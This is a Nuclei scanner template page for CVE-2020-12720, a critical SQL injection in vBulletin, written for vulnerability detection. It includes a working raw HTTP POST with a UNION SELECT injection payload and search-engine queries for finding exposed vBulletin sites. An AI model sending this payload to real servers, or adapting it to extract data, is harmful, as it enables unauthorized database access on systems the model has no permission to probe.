Skip to content
Nuclei Templates

vBulletin SQL Injection

ID: CVE-2020-12720

Severity: critical

Author: pdteam

Tags: cve2020,cve,vbulletin,sqli,packetstorm

Description

Section titled “Description”

vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2020-12720


info:
  name: vBulletin SQL Injection
  author: pdteam
  severity: critical
  description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control that permits SQL injection attacks.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying system.
  remediation: |
    Apply the latest security patch or upgrade to a non-vulnerable version of vBulletin.
  reference:
    - https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
    - https://nvd.nist.gov/vuln/detail/CVE-2020-12720
    - https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1
    - http://packetstormsecurity.com/files/157716/vBulletin-5.6.1-SQL-Injection.html
    - http://packetstormsecurity.com/files/157904/vBulletin-5.6.1-SQL-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-12720
    cwe-id: CWE-306
    epss-score: 0.88621
    epss-percentile: 0.98693
    cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: vbulletin
    product: vbulletin
    shodan-query:
      - http.title:"powered by vbulletin"
      - http.html:"powered by vbulletin"
      - http.component:"vbulletin"
      - cpe:"cpe:2.3:a:vbulletin:vbulletin"
    fofa-query:
      - body="powered by vbulletin"
      - title="powered by vbulletin"
    google-query:
      - intext:"powered by vbulletin"
      - intitle:"powered by vbulletin"
  tags: cve2020,cve,vbulletin,sqli,packetstorm


http:
  - raw:
      - |
        POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Accept: */*
        Content-Type: application/x-www-form-urlencoded


        nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-


    matchers:
      - type: word
        words:
          - "vbulletinrce"
# digest: 4a0a0047304502201ec2b694453d7023fb90f4af98fa49594c7f58f65de798e86ac649a1fc82c5a2022100e3ee2666e97c161c134d358c7edbd70e001301593f3dd4ed283675442a4bbb47:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-12720.yaml"

View on Github